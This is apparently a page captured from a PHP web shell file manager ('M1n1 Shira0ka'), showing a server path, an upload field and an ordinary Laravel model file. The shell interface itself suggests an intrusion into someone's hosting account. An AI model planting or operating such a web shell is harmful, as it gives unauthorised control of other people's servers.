M1n1 Shira0ka File Manager

Current Path : /home/bullgymbny/app/app/
Upload File :
Current File : /home/bullgymbny/app/app/Point.php

<?php

namespace App;

use Illuminate\Database\Eloquent\Model;

class Point extends Model
{
    protected $fillable = ['time', 'member_id'];
    public $timestamps = false;

    public function member(){
        return $this->belongsTo('App\Member');
    }


}

GO Party By You